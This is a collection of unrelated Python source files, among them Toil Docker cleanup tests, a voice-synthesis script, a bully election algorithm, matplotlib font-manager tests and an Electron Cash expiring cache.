# wait a bit more for script to reach stim_server.add_trigger()
time.sleep(0.2)
trig_queue.put(stim_client.get_trigger())
|
dockerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import logging
import signal
import time
import os
import sys
import uuid
import docker
from threading import Thread
from docker.errors import ContainerError
from toil.job import Job
from toil.leader import FailedJobsException
from toil.test import ToilTest, slow, needs_docker
from toil.lib.docker import apiDockerCall, containerIsRunning, dockerKill
from toil.lib.docker import FORGO, STOP, RM
logger = logging.getLogger(__name__)
@needs_docker
class DockerTest(ToilTest):
"""
Tests dockerCall and ensures no containers are left around.
When running tests you may optionally set the TOIL_TEST_TEMP environment
variable to the path of a directory where you want temporary test files be
placed. The directory will be created if it doesn't exist. The path may be
relative in which case it will be assumed to be relative to the project
root. If TOIL_TEST_TEMP is not defined, temporary files and directories will
be created in the system's default location for such files and any temporary
files or directories left over from tests will be removed automatically
removed during tear down.
Otherwise, left-over files will not be removed.
"""
def setUp(self):
self.tempDir = self._createTempDir(purpose='tempDir')
self.dockerTestLogLevel = 'INFO'
def testDockerClean(self,
disableCaching=True,
detached=True,
rm=True,
deferParam=None):
"""
Run the test container that creates a file in the work dir, and sleeps
for 5 minutes.
Ensure that the calling job gets SIGKILLed after a minute, leaving
behind the spooky/ghost/zombie container. Ensure that the container is
killed on batch system shutdown (through the deferParam mechanism).
"""
# We need to test the behaviour of `deferParam` with `rm` and
# `detached`. We do not look at the case where `rm` and `detached` are
# both True. This is the truth table for the different combinations at
# the end of the test. R = Running, X = Does not exist, E = Exists but
# not running.
# None FORGO STOP RM
# rm X R X X
# detached R R E X
# Neither R R E X
data_dir = os.path.join(self.tempDir, 'data')
working_dir = os.path.join(self.tempDir, 'working')
test_file = os.path.join(working_dir, 'test.txt')
os.makedirs(data_dir, exist_ok=True)
os.makedirs(working_dir, exist_ok=True)
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = working_dir
options.clean = 'always'
options.disableCaching = disableCaching
# No base64 logic since it might create a name starting with a `-`.
container_name = uuid.uuid4().hex
A = Job.wrapJobFn(_testDockerCleanFn,
working_dir,
detached,
rm,
deferParam,
container_name)
try:
Job.Runner.startToil(A, options)
except FailedJobsException:
# The file created by spooky_container would remain in the directory
# and since it was created inside the container, it would have had
# uid and gid == 0 (root) which may cause problems when docker
# attempts to clean up the jobstore.
file_stats = os.stat(test_file)
assert file_stats.st_gid != 0
assert file_stats.st_uid != 0
if (rm and (deferParam != FORGO)) or deferParam == RM:
# These containers should not exist
assert containerIsRunning(container_name) is None, \
'Container was not removed.'
elif deferParam == STOP:
# These containers should exist but be non-running
assert containerIsRunning(container_name) == False, \
'Container was not stopped.'
else:
# These containers will be running
assert containerIsRunning(container_name) == True, \
'Container was not running.'
client = docker.from_env(version='auto')
dockerKill(container_name, client)
try:
os.remove(test_file)
except:
pass
def testDockerClean_CRx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=FORGO)
def testDockerClean_CRx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=STOP)
def testDockerClean_CRx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_CRx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_CxD_FORGO(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_CxD_STOP(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_CxD_RM(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_CxD_None(self):
self.testDockerClean(disableCaching=True, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_Cxx_FORGO(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_Cxx_STOP(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_Cxx_RM(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_Cxx_None(self):
self.testDockerClean(disableCaching=True, detached=False, rm=False,
deferParam=None)
@slow
def testDockerClean_xRx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=FORGO)
@slow
def testDockerClean_xRx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=STOP)
@slow
def testDockerClean_xRx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=RM)
@slow
def testDockerClean_xRx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=True,
deferParam=None)
@slow
def testDockerClean_xxD_FORGO(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxD_STOP(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxD_RM(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxD_None(self):
self.testDockerClean(disableCaching=False, detached=True, rm=False,
deferParam=None)
@slow
def testDockerClean_xxx_FORGO(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=FORGO)
@slow
def testDockerClean_xxx_STOP(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=STOP)
@slow
def testDockerClean_xxx_RM(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=RM)
@slow
def testDockerClean_xxx_None(self):
self.testDockerClean(disableCaching=False, detached=False, rm=False,
deferParam=None)
def testDockerPipeChain(self, disableCaching=True):
"""
Test for piping API for dockerCall(). Using this API (activated when
list of argument lists is given as parameters), commands a piped
together into a chain.
ex: parameters=[ ['printf', 'x\n y\n'], ['wc', '-l'] ] should execute:
printf 'x\n y\n' | wc -l
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir, 'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainFn)
rv = Job.Runner.startToil(A, options)
logger.info('Container pipeline result: %s', repr(rv))
if sys.version_info >= (3, 0):
rv = rv.decode('utf-8')
assert rv.strip() == '2'
def testDockerPipeChainErrorDetection(self, disableCaching=True):
"""
By default, executing cmd1 | cmd2 | ... | cmdN, will only return an
error if cmdN fails. This can lead to all manor of errors being
silently missed. This tests to make sure that the piping API for
dockerCall() throws an exception if non-last commands in the chain fail.
"""
options = Job.Runner.getDefaultOptions(os.path.join(self.tempDir,
'jobstore'))
options.logLevel = self.dockerTestLogLevel
options.workDir = self.tempDir
options.clean = 'always'
options.caching = disableCaching
A = Job.wrapJobFn(_testDockerPipeChainErrorFn)
rv = Job.Runner.startToil(A, options)
assert rv == True
def testNonCachingDockerChain(self):
self.testDockerPipeChain(disableCaching=False)
def testNonCachingDockerChainErrorDetection(self):
self.testDockerPipeChainErrorDetection(disableCaching=False)
def _testDockerCleanFn(job,
working_dir,
detached=None,
rm=None,
deferParam=None,
containerName=None):
"""
Test function for test docker_clean. Runs a container with given flags and
then dies leaving behind a zombie container.
:param toil.job.Job job: job
:param working_dir: See `work_dir=` in :func:`dockerCall`
:param bool rm: See `rm=` in :func:`dockerCall`
:param bool detached: See `detached=` in :func:`dockerCall`
:param int deferParam: See `deferParam=` in :func:`dockerCall`
:param str containerName: See `container_name=` in :func:`dockerCall`
"""
def killSelf():
test_file = os.path.join(working_dir, 'test.txt')
# Kill the worker once we are sure the docker container is started
while not os.path.exists(test_file):
logger.debug('Waiting on the file created by spooky_container.')
time.sleep(1)
# By the time we reach here, we are sure the container is running.
time.sleep(1)
os.kill(os.getpid(), signal.SIGKILL)
t = Thread(target=killSelf)
# Make it a daemon thread so that thread failure doesn't hang tests.
t.daemon = True
t.start()
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
working_dir=working_dir,
deferParam=deferParam,
containerName=containerName,
detach=detached,
remove=rm,
privileged=True)
def _testDockerPipeChainFn(job):
"""Return the result of a simple pipe chain. Should be 2."""
parameters = [['printf', 'x\n y\n'], ['wc', '-l']]
return apiDockerCall(job,
image='ubuntu:latest',
parameters=parameters,
privileged=True)
def _testDockerPipeChainErrorFn(job):
"""Return True if the command exit 1 | wc -l raises a ContainerError."""
parameters = [ ['exit', '1'], ['wc', '-l'] ]
try:
apiDockerCall(job,
image='quay.io/ucsc_cgl/spooky_test',
parameters=parameters)
except ContainerError:
return True
return False
|
synthesize.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Synthesize waveform using converted features.
# By Wen-Chin Huang 2019.06
import json
import os
import tensorflow as tf
import numpy as np
from datetime import datetime
from importlib import import_module
import pysptk
import pyworld as pw
from scipy.io import loadmat, savemat
from scipy.io import wavfile
import argparse
import logging
import multiprocessing as mp
import sys
from preprocessing.vcc2018.feature_reader import Whole_feature_reader
from util.synthesizer import world_synthesis
from util.misc import read_hdf5
from util.postfilter import fast_MLGV
from util.f0transformation import log_linear_transformation
def read_and_synthesize(file_list, arch, stats, input_feat, output_feat):
for i, (bin_path, feat_path) in enumerate(file_list):
input_feat_dim = arch['feat_param']['dim'][input_feat]
# define paths
output_dir = os.path.dirname(bin_path).replace('converted-' + output_feat, 'converted-wav')
basename = os.path.splitext(os.path.split(bin_path)[-1])[0]
wav_name = os.path.join(output_dir, basename + '.wav')
gv_wav_name = os.path.join(output_dir, basename + '-gv.wav')
# read source features and converted spectral features
src_data = Whole_feature_reader(feat_path, arch['feat_param'])
cvt = np.fromfile(bin_path, dtype = np.float32).reshape([-1, input_feat_dim])
# f0 conversion
lf0 = log_linear_transformation(src_data['f0'], stats)
# apply gv post filtering to converted
cvt_gv = fast_MLGV(cvt, stats['gv_t'])
# energy compensation
if output_feat == 'mcc':
en_cvt = np.c_[src_data['en_mcc'], cvt]
en_cvt_gv = np.c_[src_data['en_mcc'], cvt_gv]
elif output_feat == 'sp':
cvt = np.power(10., cvt)
en_cvt = np.expand_dims(src_data['en_sp'], 1) * cvt
cvt_gv = np.power(10., cvt_gv)
en_cvt_gv = np.expand_dims(src_data['en_sp'], 1) * cvt_gv
# synthesis
world_synthesis(wav_name, arch['feat_param'],
lf0.astype(np.float64).copy(order='C'),
src_data['ap'].astype(np.float64).copy(order='C'),
en_cvt.astype(np.float64).copy(order='C'),
output_feat)
world_synthesis(gv_wav_name, arch['feat_param'],
lf0.astype(np.float64).copy(order='C'),
src_data['ap'].astype(np.float64).copy(order='C'),
en_cvt_gv.astype(np.float64).copy(order='C'),
output_feat)
def main():
parser = argparse.ArgumentParser(
description="synthesize waveforms using converted files.")
parser.add_argument(
"--logdir", required=True, type=str,
help="path of log directory")
parser.add_argument(
"--type", default='test', type=str,
help="test or valid (default is test)")
parser.add_argument(
"--input_feat", required=True,
type=str, help="input feature type")
parser.add_argument(
"--output_feat", required=True,
type=str, help="output feature type")
parser.add_argument(
"--n_jobs", default=12,
type=int, help="number of parallel jobs")
args = parser.parse_args()
# set log level
fmt = '%(asctime)s %(message)s'
datefmt = '%m/%d/%Y %I:%M:%S'
logFormatter = logging.Formatter(fmt, datefmt=datefmt)
logging.basicConfig(
level=logging.INFO,
filename=os.path.join(args.logdir, 'exp.log'),
format=fmt,
datefmt=datefmt,
)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
logging.getLogger().addHandler(consoleHandler)
logging.info('====================')
logging.info('Synthesize start')
logging.info(args)
train_dir = os.sep.join(os.path.normpath(args.logdir).split(os.sep)[:-1])
output_dir = os.path.basename(os.path.normpath(args.logdir))
src, trg = output_dir.split('-')[-2:]
# Load architecture
arch = tf.gfile.Glob(os.path.join(train_dir, 'architecture*.json'))[0] # should only be 1 file
with open(arch) as fp:
arch = json.load(fp)
input_feat = args.input_feat
output_feat = args.output_feat
# Load statistics
stats = {
'mu_s' : read_hdf5(arch['stats'], '/f0/' + src + '/mean'),
'std_s' : read_hdf5(arch['stats'], '/f0/' + src + '/std'),
'mu_t' : read_hdf5(arch['stats'], '/f0/' + trg + '/mean'),
'std_t' : read_hdf5(arch['stats'], '/f0/' + trg + '/std'),
'gv_t' : read_hdf5(arch['stats'], '/gv_{}/'.format(output_feat) + trg),
}
# Make directory
tf.gfile.MakeDirs(os.path.join(args.logdir, 'converted-wav'))
# Get and divide list
bin_list = sorted(tf.gfile.Glob(os.path.join(args.logdir, 'converted-{}'.format(output_feat), '*.bin')))
if args.type == 'test':
feat_list = sorted(tf.gfile.Glob(arch['conversion']['test_file_pattern'].format(src)))
elif args.type == 'valid':
feat_list = []
for p in arch['training']['valid_file_pattern']:
feat_list.extend(tf.gfile.Glob(p.replace('*', src)))
feat_list = sorted(feat_list)
assert(len(bin_list) == len(feat_list))
file_list = list(zip(bin_list, feat_list))
logging.info("number of utterances = %d" % len(file_list))
file_lists = np.array_split(file_list, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
processes = []
for f in file_lists:
p = mp.Process(target=read_and_synthesize, args=(f, arch, stats, input_feat, output_feat))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == '__main__':
main()
|
bully.py
|
import zmq
import time
import parse
import sys
import threading
class Bully:
def __init__(self, proc_ip, proc_port, proc_port2, id):
conf_file = open("file.config","r")
input = conf_file.readlines()
n = int(input[0])
self.processes = []
self.maxId = 0
for i in range(1,n+1):
line = parse.parse('{} {} {} {}', input[i])
self.maxId = max(self.maxId, int(line[3]))
self.processes.append({'ip': line[0], 'port': [line[1], line[2]], 'id': int(line[3])})
self.proc_ip = proc_ip
self.proc_port = proc_port
self.id = id
self.coor_id = -1
self.proc_port2 = proc_port2
def heart_beats(self, proc=None):
if proc == 'coor':
while int(self.coor_id) == int(self.id):
self.heart_socket.send_string('alive {} {} {}'.format(self.proc_ip, self.proc_port, self.id))
time.sleep(1)
else:
while True:
try:
coor_heart_beat = self.heart_socket2.recv_string()
req = parse.parse('alive {} {} {}', coor_heart_beat)
if int(req[2]) > self.id:
print("coordinator {}".format(coor_heart_beat))
self.update_coor(str(req[0]), str(req[1]), int(req[2]))
except:
if self.coor_id != self.id:
print("Coordinator is dead, get ready for election \n")
self.coor_id = -1
def establish_connection(self, TIMEOUT):
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REP)
self.socket.bind('tcp://{}:{}'.format(self.proc_ip, self.proc_port2))
self.socket2 = self.context.socket(zmq.REQ)
self.socket2.setsockopt(zmq.RCVTIMEO, TIMEOUT)
self.connect_to_higher_ids()
self.heart_context = zmq.Context()
self.heart_socket = self.heart_context.socket(zmq.PUB)
self.heart_socket.bind('tcp://{}:{}'.format(self.proc_ip, self.proc_port))
self.heart_socket2 = self.heart_context.socket(zmq.SUB)
self.heart_socket2.setsockopt(zmq.RCVTIMEO, TIMEOUT)
self.connect_all()
self.heart_socket2.subscribe("")
def connect_all(self):
for p in self.processes:
if int(p['id']) != int(self.id):
self.heart_socket2.connect('tcp://{}:{}'.format(p['ip'], p['port'][0]))
def connect_to_higher_ids(self):
for p in self.processes:
if int(p['id']) > int(self.id):
self.socket2.connect('tcp://{}:{}'.format(p['ip'], p['port'][1]))
# so that last process does not block on send...
#self.socket2.connect('tcp://{}:{}'.format(p['ip'], 55555))
def disconnect(self):
for p in self.processes:
self.socket2.disconnect('tcp://{}:{}'.format(p['ip'], p['port'][1]))
def update_coor(self, ip, port, id):
self.coor_ip = ip
self.coor_port = port
self.coor_id = id
def declare_am_coordinator(self):
print('I am the coordinator')
self.update_coor(self.proc_ip, self.proc_port, self.id)
heart_beats_thread = threading.Thread(target=self.heart_beats, args=['coor'])
heart_beats_thread.start()
def run_client(self):
while True:
if self.coor_id == -1:
try:
if self.id == self.maxId:
self.declare_am_coordinator()
else:
self.socket2.send_string('election')
req = self.socket2.recv_string()
except:
self.declare_am_coordinator()
time.sleep(1)
def run_server(self):
while True:
request = self.socket.recv_string()
if request.startswith('election'):
#respond alive..
self.socket.send_string('alive')
def run(self):
self.establish_connection(2000)
heart_beats_thread = threading.Thread(target=self.heart_beats, args=[])
heart_beats_thread.start()
serv_thread = threading.Thread(target=self.run_server, args=[])
serv_thread.start()
client_thread = threading.Thread(target=self.run_client, args=[])
client_thread.start()
ip, port1, port2, id = str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), int(sys.argv[4])
bully = Bully(ip, port1, port2, id)
bully.run()
|
http_sensor.py
|
from threading import Thread
from time import sleep
import sys
from flask import Flask
from know.http_sensor_sim import simulate_http_sensor
from flaskstream2py.flask_request_reader import FlaskRequestReader
app = Flask(__name__)
@app.route('/', methods=['POST'])
def handle_stream():
print('received request')
reader = FlaskRequestReader()
reader.open()
try:
while True:
chk = reader.read()
print(f'chk: {str(chk)}')
except:
print('Request ended. Closing reader.')
reader.close()
return 'success'
def sensor_thread(filename=None):
sleep(2)
simulate_http_sensor(filename, 'http://127.0.0.1:5000')
if __name__ == '__main__':
print(f'sys args: {sys.argv}')
t = Thread(target=sensor_thread, args=sys.argv[1:])
t.start()
app.run()
|
pyneurocl_train.py
|
import os, sys, time, threading
microdot = False
if ( os.uname()[1] == 'raspberry' ):
try:
from microdotphat import write_string
microdot = True
except ImportError:
print "---> microdotphat module is not installed on your raspberry"
sys.path.append("../lib")
import pyneurocl
print "---> pyneurocl - start"
h = pyneurocl.helper(False)
def progression_worker(h):
t_progress = 0
print "---> pyneurocl - starting progression_worker"
while (t_progress < 100) :
time.sleep(1)
t_progress = h.train_progress()
if microdot:
clear()
write_string( str( t_progress ) + "%" )
show()
else:
print "--->" + str( t_progress ) + "%"
return
try:
print "---> pyneurocl - initialize"
h.init('../nets/alpr/topology-alpr-let2.txt','../nets/alpr/weights-alpr-let2.bin')
t = threading.Thread(target=progression_worker,args=(h,))
t.start()
# NOTE: python GIL is released during training so that worker thread can call h.train_progress()
print "---> pyneurocl - train 10 epochs"
h.train('../nets/alpr/training/alpr-train-let.txt',10,10)
t.join()
except Exception:
print "---> pyneurocl - uninitialize"
h.uninit()
print "---> pyneurocl - end"
|
test_font_manager.py
|
from io import BytesIO, StringIO
import multiprocessing
import os
from pathlib import Path
import shutil
import subprocess
import sys
import warnings
import numpy as np
import pytest
from matplotlib.font_manager import (
findfont, findSystemFonts, FontProperties, fontManager, json_dump,
json_load, get_font, get_fontconfig_fonts, is_opentype_cff_font,
MSUserFontDirectories, _call_fc_list)
from matplotlib import pyplot as plt, rc_context
has_fclist = shutil.which('fc-list') is not None
def test_font_priority():
with rc_context(rc={
'font.sans-serif':
['cmmi10', 'Bitstream Vera Sans']}):
font = findfont(FontProperties(family=["sans-serif"]))
assert Path(font).name == 'cmmi10.ttf'
# Smoketest get_charmap, which isn't used internally anymore
font = get_font(font)
cmap = font.get_charmap()
assert len(cmap) == 131
assert cmap[8729] == 30
def test_score_weight():
assert 0 == fontManager.score_weight("regular", "regular")
assert 0 == fontManager.score_weight("bold", "bold")
assert (0 < fontManager.score_weight(400, 400) <
fontManager.score_weight("normal", "bold"))
assert (0 < fontManager.score_weight("normal", "regular") <
fontManager.score_weight("normal", "bold"))
assert (fontManager.score_weight("normal", "regular") ==
fontManager.score_weight(400, 400))
def test_json_serialization(tmpdir):
# Can't open a NamedTemporaryFile twice on Windows, so use a temporary
# directory instead.
path = Path(tmpdir, "fontlist.json")
json_dump(fontManager, path)
copy = json_load(path)
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'findfont: Font family.*not found')
for prop in ({'family': 'STIXGeneral'},
{'family': 'Bitstream Vera Sans', 'weight': 700},
{'family': 'no such font family'}):
fp = FontProperties(**prop)
assert (fontManager.findfont(fp, rebuild_if_missing=False) ==
copy.findfont(fp, rebuild_if_missing=False))
def test_otf():
fname = '/usr/share/fonts/opentype/freefont/FreeMono.otf'
if Path(fname).exists():
assert is_opentype_cff_font(fname)
for f in fontManager.ttflist:
if 'otf' in f.fname:
with open(f.fname, 'rb') as fd:
res = fd.read(4) == b'OTTO'
assert res == is_opentype_cff_font(f.fname)
@pytest.mark.skipif(not has_fclist, reason='no fontconfig installed')
def test_get_fontconfig_fonts():
assert len(get_fontconfig_fonts()) > 1
@pytest.mark.parametrize('factor', [2, 4, 6, 8])
def test_hinting_factor(factor):
font = findfont(FontProperties(family=["sans-serif"]))
font1 = get_font(font, hinting_factor=1)
font1.clear()
font1.set_size(12, 100)
font1.set_text('abc')
expected = font1.get_width_height()
hinted_font = get_font(font, hinting_factor=factor)
hinted_font.clear()
hinted_font.set_size(12, 100)
hinted_font.set_text('abc')
# Check that hinting only changes text layout by a small (10%) amount.
np.testing.assert_allclose(hinted_font.get_width_height(), expected,
rtol=0.1)
def test_utf16m_sfnt():
try:
# seguisbi = Microsoft Segoe UI Semibold
entry = next(entry for entry in fontManager.ttflist
if Path(entry.fname).name == "seguisbi.ttf")
except StopIteration:
pytest.skip("Couldn't find font to test against.")
else:
# Check that we successfully read "semibold" from the font's sfnt table
# and set its weight accordingly.
assert entry.weight == 600
def test_find_ttc():
fp = FontProperties(family=["WenQuanYi Zen Hei"])
if Path(findfont(fp)).name != "wqy-zenhei.ttc":
pytest.skip("Font may be missing")
fig, ax = plt.subplots()
ax.text(.5, .5, "\N{KANGXI RADICAL DRAGON}", fontproperties=fp)
for fmt in ["raw", "svg", "pdf", "ps"]:
fig.savefig(BytesIO(), format=fmt)
def test_find_invalid(tmpdir):
tmp_path = Path(tmpdir)
with pytest.raises(FileNotFoundError):
get_font(tmp_path / 'non-existent-font-name.ttf')
with pytest.raises(FileNotFoundError):
get_font(str(tmp_path / 'non-existent-font-name.ttf'))
with pytest.raises(FileNotFoundError):
get_font(bytes(tmp_path / 'non-existent-font-name.ttf'))
# Not really public, but get_font doesn't expose non-filename constructor.
from matplotlib.ft2font import FT2Font
with pytest.raises(TypeError, match='path or binary-mode file'):
FT2Font(StringIO())
@pytest.mark.skipif(sys.platform != 'linux', reason='Linux only')
def test_user_fonts_linux(tmpdir, monkeypatch):
font_test_file = 'mpltest.ttf'
# Precondition: the test font should not be available
fonts = findSystemFonts()
if any(font_test_file in font for font in fonts):
pytest.skip(f'{font_test_file} already exists in system fonts')
# Prepare a temporary user font directory
user_fonts_dir = tmpdir.join('fonts')
user_fonts_dir.ensure(dir=True)
shutil.copyfile(Path(__file__).parent / font_test_file,
user_fonts_dir.join(font_test_file))
with monkeypatch.context() as m:
m.setenv('XDG_DATA_HOME', str(tmpdir))
_call_fc_list.cache_clear()
# Now, the font should be available
fonts = findSystemFonts()
assert any(font_test_file in font for font in fonts)
# Make sure the temporary directory is no longer cached.
_call_fc_list.cache_clear()
@pytest.mark.skipif(sys.platform != 'win32', reason='Windows only')
def test_user_fonts_win32():
if not (os.environ.get('APPVEYOR') or os.environ.get('TF_BUILD')):
pytest.xfail("This test should only run on CI (appveyor or azure) "
"as the developer's font directory should remain "
"unchanged.")
font_test_file = 'mpltest.ttf'
# Precondition: the test font should not be available
fonts = findSystemFonts()
if any(font_test_file in font for font in fonts):
pytest.skip(f'{font_test_file} already exists in system fonts')
user_fonts_dir = MSUserFontDirectories[0]
# Make sure that the user font directory exists (this is probably not the
# case on Windows versions < 1809)
os.makedirs(user_fonts_dir)
# Copy the test font to the user font directory
shutil.copy(Path(__file__).parent / font_test_file, user_fonts_dir)
# Now, the font should be available
fonts = findSystemFonts()
assert any(font_test_file in font for font in fonts)
def _model_handler(_):
fig, ax = plt.subplots()
fig.savefig(BytesIO(), format="pdf")
plt.close()
@pytest.mark.skipif(not hasattr(os, "register_at_fork"),
reason="Cannot register at_fork handlers")
def test_fork():
_model_handler(0) # Make sure the font cache is filled.
ctx = multiprocessing.get_context("fork")
with ctx.Pool(processes=2) as pool:
pool.map(_model_handler, range(2))
def test_missing_family(caplog):
plt.rcParams["font.sans-serif"] = ["this-font-does-not-exist"]
with caplog.at_level("WARNING"):
findfont("sans")
assert [rec.getMessage() for rec in caplog.records] == [
"findfont: Font family ['sans'] not found. "
"Falling back to DejaVu Sans.",
"findfont: Generic family 'sans' not found because none of the "
"following families were found: this-font-does-not-exist",
]
def _test_threading():
import threading
from matplotlib.ft2font import LOAD_NO_HINTING
import matplotlib.font_manager as fm
N = 10
b = threading.Barrier(N)
def bad_idea(n):
b.wait()
for j in range(100):
font = fm.get_font(fm.findfont("DejaVu Sans"))
font.set_text(str(n), 0.0, flags=LOAD_NO_HINTING)
threads = [
threading.Thread(target=bad_idea, name=f"bad_thread_{j}", args=(j,))
for j in range(N)
]
for t in threads:
t.start()
for t in threads:
t.join()
def test_fontcache_thread_safe():
pytest.importorskip('threading')
import inspect
proc = subprocess.run(
[sys.executable, "-c",
inspect.getsource(_test_threading) + '\n_test_threading()']
)
if proc.returncode:
pytest.fail("The subprocess returned with non-zero exit status "
f"{proc.returncode}.")
|
plan_party.py
|
#uses python3
import sys
import threading
# This code is used to avoid stack overflow issues
sys.setrecursionlimit(10**6) # max depth of recursion
threading.stack_size(2**26) # new thread will get stack of such size
class Vertex:
def __init__(self, weight):
self.weight = weight
self.children = []
def ReadTree():
size = int(input())
tree = [Vertex(w) for w in map(int, input().split())]
for i in range(1, size):
a, b = list(map(int, input().split()))
tree[a - 1].children.append(b - 1)
tree[b - 1].children.append(a - 1)
return tree
def dfs(tree, vertex, parent, D):
if D[vertex] == float('inf'):
if not tree[vertex].children:
D[vertex] = tree[vertex].weight
else:
m1 = tree[vertex].weight
for child in tree[vertex].children:
if child != parent:
for grand in tree[child].children:
if grand != vertex:
m1 += dfs(tree, grand, child, D)
m0 = 0
for child in tree[vertex].children:
if child != parent:
m0 += dfs(tree, child, vertex, D)
D[vertex] = max(m1, m0)
return D[vertex]
def MaxWeightIndependentTreeSubset(tree):
size = len(tree)
if size == 0:
return 0
D = [float('inf') for _ in range(len(tree))]
return dfs(tree, 0, -1, D)
def main():
tree = ReadTree();
weight = MaxWeightIndependentTreeSubset(tree);
print(weight)
# This is to avoid stack overflow issues
threading.Thread(target=main).start()
|
caches.py
|
#!/usr/bin/env python3
import time
import threading
import queue
import weakref
from collections import defaultdict
from electroncash.util import PrintError
class ExpiringCache:
''' A fast cache useful for storing tens of thousands of lightweight items.
Use this class to cache the results of functions or other computations
when:
1. Many identical items are repetitively created (or many duplicate
computations are repetitively performed) during normal app
execution, and it makes sense to cache them.
2. The creation of said items is more computationally expensive than
accessing this cache.
3. The memory tradeoff is acceptable. (As with all caches, you are
trading CPU cost for memory cost).
And example of this is UI code or string formatting code that refreshes the
display with (mostly) the same output over and over again. In that case it
may make more sense to just cache the output items (such as the formatted
amount results from format_satoshis), rather than regenerate them, as a
performance tweak.
ExpiringCache automatically has old items expire if `maxlen' is exceeded.
Items are timestamped with a 'tick count' (granularity of 10 seconds per
tick). Their timestamp is updated each time they are accessed via `get' (so
that only the oldest items that are least useful are the first to expire on
cache overflow).
get() and put() are fast. A background thread is used to safely
expire items when the cache overflows (so that get and put never stall
to manage the cache's size and/or to flush old items). This background
thread runs every 10 seconds -- so caches may temporarily overflow past
their maxlen for up to 10 seconds. '''
def __init__(self, *, maxlen=10000, name="An Unnamed Cache"):
assert maxlen > 0
self.maxlen = maxlen
self.name = name
self.d = dict()
_ExpiringCacheMgr.add_cache(self)
def get(self, key, default=None):
res = self.d.get(key)
if res is not None:
# cache hit
res[0] = _ExpiringCacheMgr.tick # update tick access time for this cache hit
return res[1]
# cache miss
return default
def put(self, key, value):
self.d[key] = [_ExpiringCacheMgr.tick, value]
def size_bytes(self):
''' Returns the cache's memory usage in bytes. This is done by doing a
deep, recursive examination of the cache contents. '''
return get_object_size(
self.d.copy() # prevent iterating over a mutating dict.
)
def __len__(self):
return len(self.d)
class _ExpiringCacheMgr(PrintError):
'''Do not use this class directly. Instead just create ExpiringCache
instances and that will handle the creation of this object automatically
and its lifecycle.
This is a singleton that manages the ExpiringCaches. It creates a thread
that wakes up every tick_interval seconds and expires old items from
overflowing extant caches.
Note that after the last cache is gc'd the manager thread will exit and
this singleton object also will expire and clean itself up automatically.'''
_lock = threading.Lock() # used to lock _instance and self.caches
_instance = None
tick = 0
tick_interval = 10.0 # seconds; we wake up this often to update 'tick' and also to expire old items for overflowing caches
def __init__(self, add_iter=None):
cls = type(self)
assert not cls._instance, "_ExpiringCacheMgr is a singleton"
super().__init__()
cls._instance = self
self.q = queue.Queue()
self.caches = weakref.WeakSet()
if add_iter:
self.caches.update(add_iter)
self.livect = len(self.caches) # this is updated by add_cache and on_cache_gc below.
self.thread = threading.Thread(target=self.mgr_thread, daemon=True)
self.thread.start()
@classmethod
def add_cache(cls, *caches):
assert caches
new_caches = caches
with cls._lock:
slf = cls._instance
if not slf:
slf = cls(caches)
assert slf == cls._instance
else:
new_caches = [c for c in caches if c not in slf.caches]
slf.caches.update(new_caches)
for cache in new_caches:
# add finalizer for each new cache
weakref.finalize(cache, cls.on_cache_gc, cache.name)
slf.livect = len(slf.caches)
@classmethod
def on_cache_gc(cls, name):
assert cls._instance
thread2join = None
with cls._lock:
slf = cls._instance
assert slf.thread.is_alive()
slf.livect -= 1 # we need to keep this counter because the weak set doesn't have the correct length at this point yet.
slf.print_error("Cache '{}' has been gc'd, {} still alive".format(name, slf.livect))
